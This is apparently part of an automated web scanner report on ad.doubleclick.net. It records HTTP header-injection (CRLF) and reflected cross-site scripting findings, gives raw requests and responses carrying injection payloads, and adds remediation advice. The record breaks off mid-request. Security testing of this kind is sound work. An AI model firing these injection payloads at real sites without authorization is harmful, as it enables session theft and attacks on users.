The value of REST URL parameter 1 is copied into the Location response header. The payload 1c8ad%0d%0a53052c40e2c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1c8ad%0d%0a53052c40e2c/quotes.nasdaq.com/;tile=12;;abr=!webtv;key=value;sz=88x31;ord=%7B970103129278868500%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1c8ad 53052c40e2c/quotes.nasdaq.com/;tile=12;;abr=!webtv;key=value;sz=88x31;ord={970103129278868500}: Date: Sun, 13 Feb 2011 01:44:21 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2b480%0d%0acc9c9de795d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2b480%0d%0acc9c9de795d/quotes.nasdaq.com/icu_oh;tile=8;;abr=!webtv;key=value;sz=980x20;ord=%7B477519980166107400%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/asp/summaryquote.asp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2b480 cc9c9de795d/quotes.nasdaq.com/icu_oh;tile=8;;abr=!webtv;key=value;sz=980x20;ord={477519980166107400}: Date: Sun, 13 Feb 2011 02:09:56 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1cb77%0d%0aa181f422140 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1cb77%0d%0aa181f422140/quotes.nasdaq.com/news;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B152704885229468350%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/investing/tools.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1cb77 a181f422140/quotes.nasdaq.com/news;tile=1;;abr=!webtv;key=value;sz=728x90;ord={152704885229468350}: Date: Sun, 13 Feb 2011 02:15:21 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 35d75%0d%0acbe4cac2745 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /35d75%0d%0acbe4cac2745/researchtools.nasdaq.com/;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B572679921519011260%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/investing/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/35d75 cbe4cac2745/researchtools.nasdaq.com/;tile=1;;abr=!webtv;key=value;sz=728x90;ord={572679921519011260}: Date: Sun, 13 Feb 2011 02:15:43 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 32a9f%0d%0a253ddecce29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /32a9f%0d%0a253ddecce29/researchtools.nasdaq.com/wide;tile=3;;abr=!webtv;key=value;sz=120x600;ord=%7B530307983746752100%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/investing/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/32a9f 253ddecce29/researchtools.nasdaq.com/wide;tile=3;;abr=!webtv;key=value;sz=120x600;ord={530307983746752100}: Date: Sun, 13 Feb 2011 02:16:38 GMT Server: GFE/2.0
<h1>Error 302 Moved Temporarily</h1>
2. Cross-site scripting (reflected)previous There are 96 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fcfd"-alert(1)-"48722aee232 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=3fcfd"-alert(1)-"48722aee232 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7326 Cache-Control: no-cache Pragma: no-cache Date: Sun, 13 Feb 2011 18:03:31 GMT Expires: Sun, 13 Feb 2011 18:03:31 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... GVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=3fcfd"-alert(1)-"48722aee232http://www.enterpriseholdings.com/about-us/business-rental?utm_source=Google+utm_medium=Online&utm_campaign=Business_Rental"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque" ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26424"-alert(1)-"c0d4af949 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ26424"-alert(1)-"c0d4af949&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 18:01:06 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7372
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... r6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ26424"-alert(1)-"c0d4af949&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_cam ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa483"-alert(1)-"b7925e3d8fc was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912fa483"-alert(1)-"b7925e3d8fc&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 18:02:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912fa483"-alert(1)-"b7925e3d8fc&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_campaign%3DBusiness_Rental"); var fscUrl = url; var fscUrlClickTagFound = fal ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49520"-alert(1)-"e5636fe8811 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=149520"-alert(1)-"e5636fe8811&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 18:01:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... _wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=149520"-alert(1)-"e5636fe8811&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_campaign% ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 419f5"-alert(1)-"d9e1c044134 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw419f5"-alert(1)-"d9e1c044134&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 13 Feb 2011 18:02:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7380
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... zyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw419f5"-alert(1)-"d9e1c044134&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.enterpriseholdings.com/about-us/business-rental%3Futm_source%3DGoogle%2Butm_medium%3DOnline%26utm_campaign%3DBusiness_Rental"); var fscUrl = url; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e1d6"-alert(1)-"ec3e2d54ab7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l1e1d6"-alert(1)-"ec3e2d54ab7&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: 